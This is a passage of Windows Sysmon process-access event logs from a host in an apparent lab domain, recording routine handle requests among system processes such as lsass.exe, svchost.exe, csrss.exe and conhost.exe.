C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6788,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6789,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6790,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6791,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6792,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-00100B7B0900}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-00100B7B0900}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6793,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6794,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.912","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6795,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.912\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 